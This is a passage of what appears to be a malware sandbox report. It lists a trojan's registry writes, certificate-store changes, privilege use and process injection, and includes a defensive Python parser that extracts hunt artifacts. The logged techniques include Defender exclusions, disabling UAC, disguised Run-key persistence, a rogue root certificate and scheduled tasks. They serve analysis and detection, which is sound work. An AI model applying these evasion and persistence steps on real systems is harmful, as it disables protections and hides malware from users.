Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (blob data omitted) C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (blob data omitted) C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
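The indicator tables above carry the artifacts a responder actually hunts for, but they are flattened into one line per event, with file paths and registry keys that contain spaces and registry data printed as C-style quoted strings. The following script is an added example, not part of the sandbox report or of any tool it names: it parses rows in the "Description Indicator Process Target" form shown on this page (assuming the Target column is N/A, as it is for every row it handles) and flags the events worth carrying forward from this sample: the .bat files dropped into the Startup folder by msbuild.exe, the Windows Defender path exclusion the sample adds for itself, the two Run keys (named "Ledger-Live Updater" and "SysHelper" to look like legitimate software), the write of EnableLUA = 0 (which the "Checks whether UAC is enabled" section also contains, and which disables UAC outright rather than merely querying it), the .job files written through schtasks.exe, and the root certificate added under AuthRoot by thumbprint. The sample rows are copied from this report; the AuthRoot row has its certificate blob replaced by a placeholder because the page omits it. The tag names and the `triage` output shape are this example's own choices.

```python
"""Parse flattened sandbox indicator rows and extract persistence / evasion artifacts."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: rows copied from this report's indicator tables
# (Description Indicator Process Target). The AuthRoot row's certificate
# blob is replaced by a placeholder because the page does not show it.
SAMPLE_ROWS = r"""
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKiCs9k3lloeS5vcLyYa2j1X.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GDGIJECGDG.exe" C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a0e81e80-45cc-4456-972b-e9d648d8e4bd\\1346.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
File created C:\Windows\Tasks\imJjYhUpaoZYZHtqO.job C:\Windows\SysWOW64\schtasks.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = <blob omitted> C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
"""

ACTION_RE = re.compile(
    r"^(File created|File opened for modification|File opened \(read-only\)|"
    r"Key created|Key opened|Key queried|Key enumerated|Key value queried|"
    r"Set value \((?:int|str|data)\))\s+(.*)$"
)


@dataclass
class Row:
    action: str
    indicator: str           # file path or registry key
    value: Optional[str]     # unescaped data for "Set value" rows, else None
    process: Optional[str]   # acting process, None when the sandbox logged N/A


def _unquote(v: str) -> str:
    """Undo the sandbox's C-style quoting of registry data."""
    if len(v) >= 2 and v[0] == '"' and v[-1] == '"':
        v = v[1:-1]
    return v.replace('\\"', '"').replace('\\\\', '\\')


def parse_row(line: str) -> Optional[Row]:
    line = line.strip()
    if line.endswith(" N/A"):        # empty Target column (assumed for all rows here)
        line = line[:-4]
    m = ACTION_RE.match(line)
    if not m:
        return None
    action, rest = m.groups()
    # The process column is the last drive-letter path preceded by a space;
    # paths inside quoted registry data are preceded by a quote, not a space.
    cut = rest.rfind(" C:\\")
    indicator, process = (rest, None) if cut == -1 else (rest[:cut], rest[cut + 1:])
    value = None
    if action.startswith("Set value"):
        key, sep, raw = indicator.partition(" = ")
        if sep:
            indicator, value = key, _unquote(raw)
    return Row(action, indicator, value, process)


def classify(r: Row) -> Optional[str]:
    """Map one event to a hunt-worthy category; None for everything else."""
    ind = r.indicator
    if r.action == "Set value (int)" and "\\Windows Defender\\Exclusions\\" in ind:
        return "defender_exclusion"
    if r.action == "Set value (int)" and ind.endswith("\\Policies\\System\\EnableLUA") and r.value == "0":
        return "uac_disabled"
    if r.action == "Set value (str)" and "\\CurrentVersion\\Run\\" in ind:
        return "run_key_persistence"
    if r.action == "Set value (data)" and "\\SystemCertificates\\AuthRoot\\Certificates\\" in ind:
        return "authroot_cert_write"
    if r.action == "File created" and "\\Start Menu\\Programs\\Startup\\" in ind:
        return "startup_folder_drop"
    if r.action == "File created" and ind.lower().startswith("c:\\windows\\tasks\\") and ind.lower().endswith(".job"):
        return "scheduled_task_job"
    return None


def artifact(tag: str, r: Row) -> str:
    """The concrete path, binary or thumbprint to look for on other hosts."""
    if tag == "defender_exclusion":                      # Exclusions\<Type>\<target>
        return r.indicator.split("\\Exclusions\\", 1)[1].split("\\", 1)[1]
    if tag == "run_key_persistence":                     # binary before any arguments
        v = r.value or ""
        return v[1:v.index('"', 1)] if v.startswith('"') else v.split(" ")[0]
    if tag == "authroot_cert_write":                     # SHA-1 thumbprint key name
        return r.indicator.split("\\AuthRoot\\Certificates\\", 1)[1].split("\\")[0]
    return r.indicator


def triage(text: str) -> List[Tuple[str, str, Optional[str]]]:
    """Return (tag, artifact, acting process) for every flagged row, in page order."""
    out = []
    for line in text.splitlines():
        r = parse_row(line)
        if r is not None and (tag := classify(r)):
            out.append((tag, artifact(tag, r), r.process))
    return out


if __name__ == "__main__":
    for tag, what, proc in triage(SAMPLE_ROWS):
        print(f"{tag:22} {what}  <- {proc}")
```

Feed it the whole report's indicator tables and the output is a deduplicable hunt list: paths to check for on endpoints, the Run key binaries to pull hashes for, and the AuthRoot thumbprint to search for in local machine certificate stores. Rows whose Target column is a real path (the WriteProcessMemory rows) are out of scope for this parser.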

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
58 further matches recorded; the sandbox attached no description, indicator, process or target to them.

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

12 matches recorded; the sandbox attached no description, indicator, process or target to any of them.

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of UnmapMainImage


Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 456 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 456 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 652 wrote to memory of 3652 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
PID 652 wrote to memory of 3652 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
PID 652 wrote to memory of 3652 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
PID 652 wrote to memory of 384 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
PID 652 wrote to memory of 384 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
PID 652 wrote to memory of 384 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
PID 3652 wrote to memory of 2536 N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
PID 3652 wrote to memory of 2536 N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
PID 3652 wrote to memory of 2536 N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
PID 652 wrote to memory of 5104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
PID 652 wrote to memory of 5104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
PID 652 wrote to memory of 5104 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
PID 5104 wrote to memory of 3292 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
PID 5104 wrote to memory of 3292 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
PID 5104 wrote to memory of 3292 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
PID 2536 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 2536 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
PID 5104 wrote to memory of 764 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 5104 wrote to memory of 764 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 5104 wrote to memory of 764 N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 764 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 4316 N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4316 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4316 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4316 wrote to memory of 5008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4316 wrote to memory of 3972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4316 wrote to memory of 3972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4316 wrote to memory of 3972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 652 wrote to memory of 3484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
PID 652 wrote to memory of 3484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
PID 652 wrote to memory of 3484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
PID 652 wrote to memory of 1592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe
PID 652 wrote to memory of 1592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe
PID 652 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
PID 652 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
PID 652 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
PID 652 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 652 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 652 wrote to memory of 4268 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 1720 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 856 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 856 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 4268 wrote to memory of 856 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
PID 2872 wrote to memory of 2320 N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
PID 2872 wrote to memory of 2320 N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
PID 2872 wrote to memory of 2320 N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
PID 4268 wrote to memory of 3128 N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe

System policy modification

evasion
Description Indicator Process Target
